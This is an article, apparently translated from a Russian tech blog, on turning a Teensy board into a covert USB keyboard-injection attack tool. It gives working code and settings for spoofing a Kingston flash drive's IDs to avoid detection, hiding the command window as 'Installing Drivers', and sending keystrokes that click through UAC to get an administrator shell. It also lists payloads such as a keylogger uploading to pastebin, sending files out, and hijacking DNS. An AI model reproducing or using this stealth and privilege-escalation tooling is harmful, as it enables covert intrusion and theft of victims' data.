Evil USB HID emulator or just Peensy



An interesting vector of attacks is the use of USB HID emulators for keyboards (and mice) in the case of a standard USB flash drive. And if autofun.inf on a USB flash drive we already learned how to search and destroy somehow, then with HID emulators everything is so far bad.

For those who are not familiar with this topic yet, I recommend reading the " HID combat HID emulator on Arduino " hub for a start . Here I will not touch on the issues of installing and configuring the Arduino programming environment, but rather I will tell you a little bit about the advanced use of Peensy (Pentest + Teensy).

Iron


The first thing to start is to buy a Teensy MicroSD adapter and DIP switch. The first is needed so that Peensy can emulate not only the keyboard, but also the USB flash drive itself. And it’s more convenient to store ready-made scripts on a USB flash drive than to “fill” them again every time. The DIP switch will help in the field to select the desired load, or, for example, switch between the 32-bit and 64-bit versions of the script.

Ready Peensy will look something like this:



You can immediately buy a ready-to-use rubber duck .



Hiding Peensy


Some protections have already learned to detect and block Peensy. But they do it according to the bunch of VendorID & ProductID, which we can change in the Arduino programming environment.
We are looking for the file \ arduino-1.0.1-windows \ arduino-1.0.1 \ hardware \ teensy \ cores \ usb_hid \ usb_private.h and change the corresponding parameters to the parameters of the Kingston flash drive , for example. In addition, scroll down the file and change the parameter STR_PRODUCT from "Teensy" to "Kingston DataTraveler 2Gb". Now, when installing Peensy drivers, only the driver of the composite device will be able to give us out instead of the usual, memory one. But who will pay attention to this?

Peensy's main work takes place in the cmd window. By adding a key pair, we can make the command window much less noticeable:

cmd /T:01 /K "@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers" 



Turn on feedback


A significant drawback of Teensy's work was the use of a giant delay in the initial operation of the device, which was necessary for the initial installation of drivers. In the Kautilya framework, the initial delay is 25 seconds by default. In 25 seconds, you can and have time to throw off the "necessary documents" from a colleague to the "USB flash drive" and turn it off. And if the driver is installed, say, in 30 seconds, then instead of the CMD window, Peensy will put its battle script directly into the open Word window.

The lack of feedback and a giant delay for the initial installation of drivers significantly reduced the effectiveness of Peensy ... until they came up with NumLock for this purpose!

When the NumLock key is pressed, the system instructs the keyboard to light the corresponding diode. This feature can be used for feedback in Peensy code.

We change the 25 second delay to check the reaction of the system to pressing the Peensy NumLock key.

int ledkeys(void)       {return int(keyboard_leds);}
bool is_num_on(void)    {return ((ledkeys() & 1) == 1) ? true : false;}
void wait_for_drivers()
{
	bool numLockTrap = is_num_on();
	while(numLockTrap == is_num_on())  //нажимаем клавишу NumLock пока не изменится ее состояние
	{
	        Keyboard.set_key1(KEY_NUM_LOCK);
	        Keyboard.send_now();        //нажали NumLock
	        delay(200);
	        Keyboard.set_modifier(0);
	        Keyboard.set_key1(0);         
	        Keyboard.send_now();        //отпустили
	        delay(200);
	}
}

Now we can check if PowerShell is installed on the system.
Make sure NumLock is turned off

	if (is_num_on())                 
	{
		delay(500);
		Keyboard.set_key1(KEY_NUM_LOCK);
		Keyboard.send_now();
		delay(700);
		Keyboard.set_modifier(0);
		Keyboard.set_key1(0);
		Keyboard.send_now();
		delay(500);
	}

Turn it on through PowerShell (cmd should be open)

Keyboard.println("echo Set WshShell = WScript.CreateObject(\"WScript.Shell\"): WshShell.SendKeys \"{NUMLOCK}\"' > numlock.vbs");
delay(400);
Keyboard.println("cscript numlock.vbs");
delay(400);

Now it remains only to check the status of NumLock using is_num_on () to understand whether the script worked or not.

Checks using NumLock (as well as Caps and Scroll lock) can be inserted into any part of the Peensy code. For example, you can check whether the user has removed the focus from the CMD window, whether the script worked correctly, etc.

Run the command line with administrator privileges


To run the command line with administrator privileges, you need to press WinKey, type “cmd”, press Ctrl + Shift + Enter and in the appeared UAC window press “left” + Enter.

In Peensy code, it will look like this:

  Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
  Keyboard.send_now();                     //нажимаем WinKey
  delay(400);
  Keyboard.set_modifier(0);
  Keyboard.send_now();                     //отпускаем
  delay(100);
  Keyboard.print("cmd /T:01 /K \"@echo off && mode con:COLS=15 LINES=1 && title Installing Drivers\" ");  //запускаем cmd
  delay(400);
  Keyboard.set_modifier(MODIFIERKEY_CTRL);
  Keyboard.send_now();
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();             //открываем cmd с админскими правами
  delay(400);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();              //отпускаем ctrl+shift+enter
  delay(400);
  Keyboard.set_key1(KEY_LEFT);
  Keyboard.send_now();            //жмем влево
  delay(100);
  Keyboard.set_key1(0);
  Keyboard.send_now();              
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();            //жмем enter
  delay(100);
  Keyboard.set_key1(0);
  Keyboard.send_now();


This code will work in 2 seconds. You can try to reduce it to 1.

Most of Peensy’s workloads require administrator rights, but there are some interesting scripts (for example, a keylogger with sending all keystrokes to pastebin) that will quietly start with user rights.

If this topic is of interest to the habrayuzer, I will analyze a few interesting scripts in the following articles. However, scripts can be downloaded and studied independently from the blog of the author Kautilya Nikhil Mittal .

Conclusion


The spectrum and possibilities of Peensy are growing every day. On a fast modern computer, Peensy is able to shed its load in seconds, having done so secretively enough not to be detected by most PC users.

The presence of feedback using the NumLock and / or ScrollLock keys allows you to create adaptive and fault-tolerant loads. Using PowerShell greatly expands the capabilities of the attacker.

Using PowerShell, for example, you can:
- send information about the system / contents of a given file to pastebin.com using a hidden Internet Explorer window;
- change the DNS server (which will allow you to control the Internet activity of the user);
- download and run the executable file;
- edit the HOSTS file (needed to replace web pages, for example, a client bank);
- enable the RDP protocol and configure it to connect an attacker;
- install a script keylogger or sniffer;
- raise the wifi access point with the given parameters, etc.

Here is a small demonstration of Teensy working on a real machine with a load in the form of a notepad with admin rights.



What else to read?



Also popular now: